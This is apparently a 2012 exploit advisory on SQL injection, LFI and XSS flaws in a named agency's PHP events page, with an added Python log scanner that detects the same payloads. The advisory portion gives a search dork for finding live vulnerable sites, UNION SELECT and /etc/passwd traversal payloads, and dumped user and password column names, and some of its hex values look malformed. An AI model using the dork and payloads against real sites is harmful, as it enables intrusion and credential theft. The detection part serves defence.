-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Author: Ur0b0r0x
# Twitter: @Ur0b0r0x
# Email: ur0b0r0x_4n1@live.com
# Line: GreyHat

# Exploit Title: Agencia[e] - SQL Injection / LFI / XSS Vulnerabilities
# Dork: intext: inurl:eventos_mas.php?ideve=
# Date: 16/11/2012
# Url Vendor: http://www.agenciae.tv/
# Vendor Name: Agencia[e]
# Tested On: Backtrack R3 / Linux Mint
# Type: php
# Info: Official Center Porsche In Spain

------------------- Agreement --------------------
[12/11/2012] - Vulnerability discovered
[15/11/2012] - Vendor notified, did not respond
[16/11/2012] - Public disclosure
--------------------------------------------------

# Expl0it/P0c ###################

http://site.com/eventos_mas.php?ideve= < Sql Vulnerability Path >
http://site.com/eventos_mas.php?ideve= < LFi Vulnerability Path >
http://site.com/eventos_mas.php?ideve= < XSS Vulnerability Path >

# Exploit/Command/Sql=> +union+select+1,2,3,4--+
# Exploit/Command/Xss=> ">
# Exploit/Command/Lfi=> /../../../../../../../etc/passwd%00/../../../
# Payload/Command/Sql=> table_schema=00x5E6536C65716672756732423423 / table_name=0x44F6277C616670x5E6536C65756546269

# Demo_Xss_Sql_Vulnerabilities

# The Same Tables And Columns On All Vulnerable Sites

+----------+
| control  |
| eventos  |
| noticias |
| usuarios |
+----------+

+---------+
| Column  |
+---------+
| alias   |
| id      |
| nombre  |
| pwd     |
| sid     |
| url     |
| usuario |
+---------+
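
# Detection (added example, not part of the original advisory)
The legitimate values of ideve on this page are plain integers, so any request to eventos_mas.php whose ideve is not all digits is worth flagging. The sketch below scans web access logs for that condition and labels the three payload shapes listed above; the log lines, IP addresses and the function names classify/scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; IPs are documentation placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [16/Nov/2012:10:00:01 +0100] "GET /eventos_mas.php?ideve=14 HTTP/1.1" 200 5120
198.51.100.9 - - [16/Nov/2012:10:00:05 +0100] "GET /eventos_mas.php?ideve=14' HTTP/1.1" 200 312
198.51.100.9 - - [16/Nov/2012:10:00:09 +0100] "GET /eventos_mas.php?ideve=14+union+select+1,2,3,4--+ HTTP/1.1" 200 5300
198.51.100.9 - - [16/Nov/2012:10:00:12 +0100] "GET /eventos_mas.php?ideve=/../../../../etc/passwd%00/../ HTTP/1.1" 200 90
198.51.100.9 - - [16/Nov/2012:10:00:15 +0100] "GET /eventos_mas.php?ideve=%22%3E HTTP/1.1" 200 4100
198.51.100.3 - - [16/Nov/2012:10:00:20 +0100] "GET /index.php?id=3 HTTP/1.1" 200 2048
"""

# Payload shapes taken from the advisory: quote / UNION SELECT / SQL comment,
# directory traversal with a null byte, and an attribute-breaking "> sequence.
RULES = [
    ("sqli", re.compile(r"'|\bunion\b.*\bselect\b|--", re.I)),
    ("lfi", re.compile(r"\.\./|\x00")),
    ("xss", re.compile(r"[\"<>]")),
]
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return [] for a clean integer id, otherwise the matching labels."""
    if re.fullmatch(r"[0-9]+", value):
        return []
    tags = [name for name, rx in RULES if rx.search(value)]
    return tags or ["non-numeric"]

def scan(log_text, path="/eventos_mas.php", param="ideve"):
    """Yield (client_ip, decoded_value, labels) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(path):
            continue
        # parse_qs URL-decodes the value, so %00 and %22%3E are seen decoded.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            tags = classify(value)
            if tags:
                findings.append((ip, value, tags))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same all-digits check, applied server-side before ideve reaches the query, a file path or the rendered page, rejects all three payload classes.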